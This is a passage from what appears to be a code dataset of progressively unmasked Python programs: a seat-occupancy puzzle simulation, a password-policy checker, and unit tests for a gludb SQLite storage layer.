occupied\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n end = False\n round = 1\n while not end:\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n if data[i][j] == 'L' and get_occupied_seats(data, i, j) == 0:\n data_next[i][j] = '#'\n elif data[i][j] == '#' and get_occupied_seats(data, i, j) >= 5:\n data_next[i][j] = 'L'\n print('Round %d' % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print('')\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n return occupied, found\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\ndef is_top_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n return occupied\n\n\ndef is_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n return occupied\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\ndef is_bottom_occupied(data, i, j):\n found = False\n occupied = 0\n while j < len(data[0]) and not found:\n occupied, found = check_seat(data, i, j)\n j += 1\n return occupied\n\n\ndef is_bottom_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j += 1\n return occupied\n\n\ndef is_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n return occupied\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n end = False\n round = 1\n while not end:\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n if data[i][j] == 'L' and get_occupied_seats(data, i, j) == 0:\n data_next[i][j] = '#'\n elif data[i][j] == '#' and get_occupied_seats(data, i, j) >= 5:\n data_next[i][j] = 'L'\n print('Round %d' % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print(\"\")\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n\n return occupied, found\n\n\ndef is_top_left_occupied(data,i,j):\n found = False\n occupied = 0\n while (i >= 0) and (j >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n\n return occupied\n\n\ndef is_top_occupied(data,i,j):\n found = False\n occupied = 0\n while (j >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n j -= 1\n\n return occupied\n\n\ndef is_top_right_occupied(data,i,j):\n found = False\n occupied = 0\n while (i < len(data)) and (j >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n\n return occupied\n\n\ndef is_right_occupied(data,i,j):\n found = False\n occupied = 0\n while (i < len(data)) and (not found):\n occupied, found = check_seat(data, i, j)\n i += 1\n\n return occupied\n\n\ndef is_bottom_right_occupied(data,i,j):\n found = False\n occupied = 0\n while (i < len(data)) and (j < len(data[i])) and (not found):\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n\n return occupied\n\n\ndef is_bottom_occupied(data,i,j):\n found = False\n occupied = 0\n while (j < len(data[0])) and (not found):\n occupied, found = check_seat(data, i, j)\n j += 1\n\n return occupied\n\n\ndef is_bottom_left_occupied(data,i,j):\n found = False\n occupied = 0\n while (i >= 0) and (j < len(data[i])) and (not found):\n occupied, found = check_seat(data, i, j)\n i -= 1\n j += 1\n\n return occupied\n\n\ndef is_left_occupied(data,i,j):\n found = False\n occupied = 0\n while (i >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n i -= 1\n\n return occupied\n\n\ndef get_occupied_seats(data,i,j):\n occupied_seats = ( is_top_left_occupied(data, i-1, j-1) +\n is_top_occupied(data, i, j-1) +\n is_top_right_occupied(data, i+1, j-1) +\n is_right_occupied(data, i+1, j) +\n is_bottom_right_occupied(data, i+1, j+1) +\n is_bottom_occupied(data, i, j+1) +\n is_bottom_left_occupied(data, i-1, j+1) +\n is_left_occupied(data, i-1, j) )\n\n # print(occupied_seats)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == \"#\": seats += 1\n\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n\n end = False\n round = 1\n while not end:\n for i in range(0,len(data)):\n for j in range(0,len(data[i])):\n if (data[i][j] == 'L') and (get_occupied_seats(data,i,j) == 0):\n data_next[i][j] = '#'\n elif (data[i][j] == '#') and (get_occupied_seats(data,i,j) >= 5):\n data_next[i][j] = 'L'\n\n print (\"Round %d\" % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
5,
10,
11,
14,
16
]
}
|
[
5,
10,
11,
14,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('input.txt', 'r') as f:
lines = f.read()
<|reserved_special_token_0|>
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('input.txt', 'r') as f:
lines = f.read()
lines = lines.split('\n')[:-1]
lines = [l.split(' ') for l in lines]
valid = 0
new_valid = 0
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
<|reserved_special_token_1|>
"""
Day 2
"""
with open('input.txt', 'r') as f:
lines = f.read()
lines = lines.split('\n')[:-1]
lines = [l.split(' ') for l in lines]
valid = 0
new_valid = 0
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
|
flexible
|
{
"blob_id": "46a3c3777d90976c7d39772d2e94430506d3acd7",
"index": 8025,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('input.txt', 'r') as f:\n lines = f.read()\n<mask token>\nfor cur_pw in lines:\n letter = cur_pw[1].strip(':')\n amount = cur_pw[2].count(letter)\n rule = cur_pw[0].split('-')\n rule = [int(r) for r in rule]\n if amount >= rule[0] and amount <= rule[1]:\n valid += 1\n occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]\n if occurences.count(letter) == 1:\n new_valid += 1\nprint(valid)\nprint(new_valid)\n",
"step-3": "<mask token>\nwith open('input.txt', 'r') as f:\n lines = f.read()\nlines = lines.split('\\n')[:-1]\nlines = [l.split(' ') for l in lines]\nvalid = 0\nnew_valid = 0\nfor cur_pw in lines:\n letter = cur_pw[1].strip(':')\n amount = cur_pw[2].count(letter)\n rule = cur_pw[0].split('-')\n rule = [int(r) for r in rule]\n if amount >= rule[0] and amount <= rule[1]:\n valid += 1\n occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]\n if occurences.count(letter) == 1:\n new_valid += 1\nprint(valid)\nprint(new_valid)\n",
"step-4": "\"\"\"\nDay 2\n\"\"\"\n\nwith open('input.txt', 'r') as f:\n lines = f.read()\n\nlines = lines.split('\\n')[:-1]\nlines = [l.split(' ') for l in lines]\n\nvalid = 0\nnew_valid = 0\nfor cur_pw in lines:\n\n letter = cur_pw[1].strip(':')\n amount = cur_pw[2].count(letter)\n rule = cur_pw[0].split('-')\n rule = [int(r) for r in rule]\n\n if amount >= rule[0] and amount <= rule[1]:\n valid += 1\n\n occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]\n if occurences.count(letter) == 1:\n new_valid += 1\n\nprint(valid)\nprint(new_valid)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""Testing data storage functionality in gludb.simple (see simple_tests.py for
testing of the rest of gludb.simple functionality)"""
import unittest
import datetime
import time
import gludb.config
from gludb.versioning import VersioningTypes
from gludb.data import orig_version
from gludb.simple import DBObject, Field
from gludb.utils import parse_now_field
from utils import compare_data_objects
@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)
class SimpleStorage(object):
name = Field('default name')
descrip = Field()
age = Field(42)
extra_data = Field(dict)
# Same tests as DefaultStorageTesting but with differnt setUp/tearDown
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None) # no default database
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
# Sucks, but we need to space out our timestamps
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
# Note that we DON'T check for string equality - that's because
# _last_update is updated every time the instance method to_data is
# called. See simple.md for extra details on auto fields
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
# Saved - so should have a prev version that is identical
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
# Change the object we read and then insure that the pervious version
# saved on load is correct
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
# Same tests as DefaultStorageTesting but with differnt setUp/tearDown
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None) # no default database
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
# Same tests as DefaultStorageTesting but with differnt setUp/tearDown
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = "Prefix"
def setUp(self):
gludb.config.default_database(None) # no default database
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite',
filename=':memory:'
))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
|
normal
|
{
"blob_id": "7383ae97d6a1368896d05d0cafc9846c24004701",
"index": 2690,
"step-1": "<mask token>\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n <mask token>\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n <mask token>\n <mask token>\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-2": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-3": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-4": "<mask token>\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n 